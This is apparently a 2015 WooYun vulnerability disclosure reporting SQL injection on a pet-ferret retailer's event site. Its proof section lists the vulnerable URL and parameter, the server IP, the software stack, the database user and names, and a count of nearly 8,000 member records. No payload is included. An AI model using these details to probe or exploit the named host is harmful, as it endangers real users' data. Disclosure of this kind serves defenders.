
Vulnerability summary

Defect ID: wooyun-2015-0100670

Title: SQL injection on a certain luxury pet-ferret website could expose the information of nearly 8,000 users

Related vendor: a certain luxury pet-ferret website

Author: 雅柏菲卡

Submitted: 2015-03-11 14:26

Fix time: 2015-04-25 14:28

Disclosure time: 2015-04-25 14:28

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-03-11: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-04-25: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

.....

Detailed description:

.................

Proof of vulnerability:

Target: 		http://event.angora.com.cn/vote.php?uid=1698
Host IP: 116.255.140.117
Web Server: Microsoft-IIS/6.0
Powered-by: PHP/5.2.1
Powered-by: ASP.NET
DB Server: MySQL
Resp. Time(avg): 2549 ms
Current User: angora_ucroot@localhost
Current DB: angora_event
System User: angora_ucroot@localhost
Host Name: A0008-1014001
Compile OS: Win32
Installation dir: D:\MySQL Server 5.1
DB User: 'angora_ucroot'@'localhost'
Data Bases: information_schema
angora_event
angora_hd
angora_home
angora_homeenglish
angora_ucenter
angora_uchome
angora_weibo
Count(*) of angora_ucenter.uc_members is 7992
The above is an excerpt.

Remediation:

...............

Copyright notice: when reposting, please credit the source: 雅柏菲卡@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively declined.